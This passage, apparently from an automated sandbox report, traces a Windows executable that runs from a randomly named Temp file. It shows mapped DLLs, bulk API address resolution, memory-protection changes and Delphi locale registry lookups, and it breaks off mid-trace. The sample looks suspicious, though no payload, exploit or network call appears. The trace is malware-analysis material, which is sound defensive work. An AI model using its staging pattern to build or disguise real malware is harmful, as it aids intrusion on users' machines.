end_va = 0x1a6ffff entry_point = 0x0 region_type = private 
name = "private_0x0000000001940000" filename = "" Region: id = 24104 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 24105 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 24121 start_va = 0x1a70000 end_va = 0x1b6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a70000" filename = "" Region: id = 24122 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 24123 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Thread: id = 411 os_tid = 0x728 [0174.873] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0174.873] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0174.874] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0174.874] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0174.874] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQueryEx") returned 0x76944e42 [0174.874] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0174.874] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0174.874] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0174.874] GetProcAddress (hModule=0x76910000, lpProcName="VerSetConditionMask") returned 0x77253030 [0174.874] GetProcAddress (hModule=0x76910000, 
lpProcName="VerifyVersionInfoW") returned 0x76950e91 [0174.874] GetProcAddress (hModule=0x76910000, lpProcName="TerminateProcess") returned 0x76952331 [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="SuspendThread") returned 0x76970ca9 [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="SizeofResource") returned 0x76953e7f [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPriority") returned 0x76954815 [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="SetLastError") returned 0x7695bb08 [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="SetFilePointer") returned 0x7695db36 [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="SetEvent") returned 0x7695bccc [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="SetEndOfFile") returned 0x76952319 [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="ResetEvent") returned 0x7695bcb4 [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseMutex") returned 0x7695ba72 [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="ReadFile") returned 0x769596fb [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceFrequency") returned 0x769522a7 [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="OpenProcess") returned 0x769559d7 [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="OpenMutexW") returned 0x7696992d [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="LockResource") returned 0x7694fd29 [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0174.875] GetProcAddress (hModule=0x76910000, 
lpProcName="LocalAlloc") returned 0x76963363 [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="LoadResource") returned 0x7695984d [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryW") returned 0x76963c01 [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="HeapFree") returned 0x7695bbd0 [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="HeapDestroy") returned 0x76952301 [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="HeapCreate") returned 0x76963ea2 [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="HeapAlloc") returned 0x77282dd6 [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="GetVersionExW") returned 0x76953b1a [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadTimes") returned 0x76945bfd [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPriority") returned 0x76959147 [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadLocale") returned 0x7695153c [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimes") returned 0x7696d83a [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="GetShortPathNameW") returned 0x76950bbc [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="GetProcessTimes") returned 0x7694f626 [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0174.877] GetProcAddress 
(hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0174.877] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0174.877] GetProcAddress (hModule=0x76910000, lpProcName="GetLocalTime") returned 0x7695a90e [0174.877] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0174.877] GetProcAddress (hModule=0x76910000, lpProcName="GetFullPathNameW") returned 0x76964543 [0174.877] GetProcAddress (hModule=0x76910000, lpProcName="GetFileAttributesW") returned 0x769664ff [0174.877] GetProcAddress (hModule=0x76910000, lpProcName="GetExitCodeThread") returned 0x76946ddd [0174.877] GetProcAddress (hModule=0x76910000, lpProcName="GetDriveTypeW") returned 0x76963be6 [0174.877] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceW") returned 0x76943530 [0174.877] GetProcAddress (hModule=0x76910000, lpProcName="GetDateFormatW") returned 0x7695afab [0174.877] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0174.877] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThread") returned 0x76963351 [0174.877] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessId") returned 0x7695cac4 [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcess") returned 0x7695cdcf [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="GetComputerNameA") returned 0x76946ba9 [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfoExW") returned 0x76948b1b [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfo") returned 0x76961e2e [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="FreeResource") returned 0x7694f1bd [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="InterlockedCompareExchange") returned 0x7695bb92 [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 
0x7695d9d0 [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="FormatMessageW") returned 0x769554a3 [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="FindResourceW") returned 0x76953e61 [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="FindNextFileW") returned 0x7695963a [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="ExpandEnvironmentStringsW") returned 0x76954680 [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="EnumSystemLocalesW") returned 0x7699f3df [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="EnumCalendarInfoW") returned 0x7699f38f [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="DeleteFileW") returned 0x76950f62 [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0174.878] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessW") returned 0x7691204d [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="CreateMutexW") returned 0x76952aee [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileW") returned 0x7695cc56 [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventW") returned 0x76963386 [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="CreateDirectoryW") returned 0x76953925 [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileW") returned 0x769467c3 [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0174.879] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 
0x7695ba46 [0174.879] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="lstrlenW") returned 0x7695d9e8 [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemInfo") returned 0x76963728 [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="GetVersion") returned 0x7695154e [0174.879] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadLocale") returned 0x769788e6 [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemDefaultUILanguage") returned 0x7694731d [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="GetUserDefaultUILanguage") returned 0x769522ef [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="MultiByteToWideChar") returned 0x7696452b [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryExW") returned 0x76954775 [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="GetStartupInfoW") returned 
0x76963891 [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineW") returned 0x7696679e [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="UnhandledExceptionFilter") returned 0x7696ed38 [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="RtlUnwind") returned 0x76947f70 [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0174.880] GetProcAddress (hModule=0x76910000, lpProcName="ExitProcess") returned 0x7696214f [0174.881] GetProcAddress (hModule=0x76910000, lpProcName="ExitThread") returned 0x7725f611 [0174.881] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0174.881] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0174.881] GetProcAddress (hModule=0x76910000, lpProcName="CreateThread") returned 0x7696375d [0174.881] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0174.881] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0174.881] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0174.881] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0174.882] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0174.882] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0174.882] GetProcAddress 
(hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0174.882] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0174.882] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0174.882] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0174.882] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0174.882] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0174.882] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryA") returned 0x7696395c [0174.882] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0174.882] GetProcAddress (hModule=0x76910000, lpProcName="TlsSetValue") returned 0x7695da88 [0174.882] GetProcAddress (hModule=0x76910000, lpProcName="TlsGetValue") returned 0x7695da70 [0174.882] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0174.882] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0174.882] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0174.882] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0174.884] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0174.884] GetProcAddress (hModule=0x769f0000, lpProcName="OpenThreadToken") returned 0x76a0432c [0174.884] GetProcAddress (hModule=0x769f0000, lpProcName="OpenProcessToken") returned 0x76a04304 [0174.884] GetProcAddress (hModule=0x769f0000, lpProcName="GetUserNameA") returned 0x76a1a4b4 [0174.897] GetProcAddress (hModule=0x769f0000, lpProcName="GetTokenInformation") returned 0x76a0431c [0174.897] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthorityCount") returned 0x76a00e0c [0174.897] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthority") returned 0x76a00e24 [0174.897] GetProcAddress (hModule=0x769f0000, 
lpProcName="FreeSid") returned 0x76a0412e [0174.897] GetProcAddress (hModule=0x769f0000, lpProcName="EqualSid") returned 0x76a0410b [0174.897] GetProcAddress (hModule=0x769f0000, lpProcName="AllocateAndInitializeSid") returned 0x76a040e6 [0174.897] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0174.897] GetProcAddress (hModule=0x769f0000, lpProcName="RegQueryValueExW") returned 0x76a046ad [0174.897] GetProcAddress (hModule=0x769f0000, lpProcName="RegOpenKeyExW") returned 0x76a0468d [0174.897] GetProcAddress (hModule=0x769f0000, lpProcName="RegCloseKey") returned 0x76a0469d [0174.897] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0174.897] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0174.897] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0174.897] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0174.897] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76750000 [0174.898] GetProcAddress (hModule=0x76750000, lpProcName="CoTaskMemFree") returned 0x767a6f41 [0174.898] GetProcAddress (hModule=0x76750000, lpProcName="StringFromCLSID") returned 0x7676eb17 [0174.898] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstance") returned 0x76799d0b [0174.898] GetProcAddress (hModule=0x76750000, lpProcName="CoUninitialize") returned 0x767986d3 [0174.898] GetProcAddress (hModule=0x76750000, lpProcName="CoInitialize") returned 0x7676b636 [0174.898] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0174.898] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayPtrOfIndex") returned 0x76c2e1ce [0174.898] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetUBound") returned 0x76c2e127 [0174.898] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetLBound") returned 0x76c2e173 [0174.898] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayCreate") returned 0x76c2e263 
[0174.898] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeType") returned 0x76c15dee [0174.898] GetProcAddress (hModule=0x76c10000, lpProcName="VariantCopy") returned 0x76c148f1 [0174.898] GetProcAddress (hModule=0x76c10000, lpProcName="VariantClear") returned 0x76c13eae [0174.898] GetProcAddress (hModule=0x76c10000, lpProcName="VariantInit") returned 0x76c13ed5 [0174.898] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0174.898] GetProcAddress (hModule=0x76c10000, lpProcName="GetErrorInfo") returned 0x76c13f21 [0174.899] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0174.899] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0174.899] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0174.899] GetProcAddress (hModule=0x76c10000, lpProcName="SysReAllocStringLen") returned 0x76c17810 [0174.899] GetProcAddress (hModule=0x76c10000, lpProcName="SysAllocStringLen") returned 0x76c145d2 [0174.899] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75830000 [0174.899] GetProcAddress (hModule=0x75830000, lpProcName="SHGetSpecialFolderPathW") returned 0x75850468 [0174.899] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0174.899] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0174.899] GetProcAddress (hModule=0x76b40000, lpProcName="CharNextW") returned 0x76b50be6 [0174.899] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0174.899] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0174.899] GetProcAddress (hModule=0x76b40000, lpProcName="PeekMessageW") returned 0x76b5634a [0174.899] GetProcAddress (hModule=0x76b40000, lpProcName="MsgWaitForMultipleObjects") returned 0x76b537d8 [0174.899] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxW") returned 0x76b9ea5f [0174.899] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 
0x76b4dfba [0174.900] GetProcAddress (hModule=0x76b40000, lpProcName="GetSystemMetrics") returned 0x76b567cf [0174.900] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperBuffW") returned 0x76b5ebd5 [0174.900] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperW") returned 0x76b5e981 [0174.900] GetProcAddress (hModule=0x76b40000, lpProcName="CharLowerBuffW") returned 0x76b53afe [0174.900] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x40) returned 1 [0174.900] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x4) returned 1 [0174.900] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0174.900] SetThreadLocale (Locale=0x400) returned 1 [0174.901] GetVersion () returned 0x1db10106 [0174.901] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0174.901] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPreferredUILanguages") returned 0x769522d7 [0174.901] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0174.901] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPreferredUILanguages") returned 0x7694e627 [0174.901] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0174.901] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadUILanguage") returned 0x7694ae42 [0174.901] GetSystemInfo (in: lpSystemInfo=0x12fc34 | out: lpSystemInfo=0x12fc34*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0174.901] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" 
\"100_OK\" \"60000\"" [0174.901] GetStartupInfoW (in: lpStartupInfo=0x12fc10 | out: lpStartupInfo=0x12fc10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0174.901] GetACP () returned 0x4e4 [0174.901] GetCurrentThreadId () returned 0x728 [0174.901] GetVersion () returned 0x1db10106 [0174.901] GetVersionExW (in: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7728f879, dwMinorVersion=0x7728f99a, dwBuildNumber=0x2b1ca8, dwPlatformId=0x12fbaa, szCSDVersion="") | out: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0174.902] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x12da00, nSize=0x20a | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe")) returned 0x30 [0174.902] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12d7ea, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe")) returned 0x30 [0174.902] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1300000 [0174.902] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0174.902] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0174.902] RegOpenKeyExW (in: 
hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0174.902] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0174.902] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0174.902] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0174.902] GetUserDefaultUILanguage () returned 0x409 [0174.904] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0174.904] GetThreadUILanguage () returned 0x120409 [0174.904] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768) returned 1 [0174.904] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x142a680, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x142a680, pcchLanguagesBuffer=0x12d768) returned 1 [0174.904] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.en-US", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0174.904] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.en", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0174.905] GetUserDefaultUILanguage () returned 0x409 [0174.905] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x12d784, cchData=4 | out: lpLCData="ENU") returned 4 [0174.905] FindFirstFileW (in: 
lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.ENU", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0174.905] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.EN", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0174.905] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: 
